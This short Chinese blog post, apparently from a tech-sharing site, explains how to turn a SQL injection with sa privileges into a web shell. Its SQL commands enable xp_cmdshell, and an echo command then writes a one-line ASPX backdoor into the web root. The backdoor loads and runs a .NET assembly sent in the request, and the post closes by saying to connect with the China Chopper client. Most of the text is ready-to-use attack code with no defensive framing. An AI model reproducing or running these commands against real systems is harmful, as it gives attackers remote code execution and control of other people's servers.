sql注入创建aspx文件方法

先开启xpcmdshell前提是sa用户,可以注入时使用



exec
sp_configure 'show advanced options',1 ;reconfigure ;
go
sp_configure 'xp_cmdshell',1 reconfigure 


然后运行创建文件







Exec master.dbo.xp_cmdshell 'echo ^<%@ Page Language=”C#” ValidateRequest=”false” %^>^<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["hez"].Value))).CreateInstance(“c”, true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%^> >>c:\\web\123.aspx'

菜刀连上拿下

你可能感兴趣的:(sql注入创建aspx文件方法)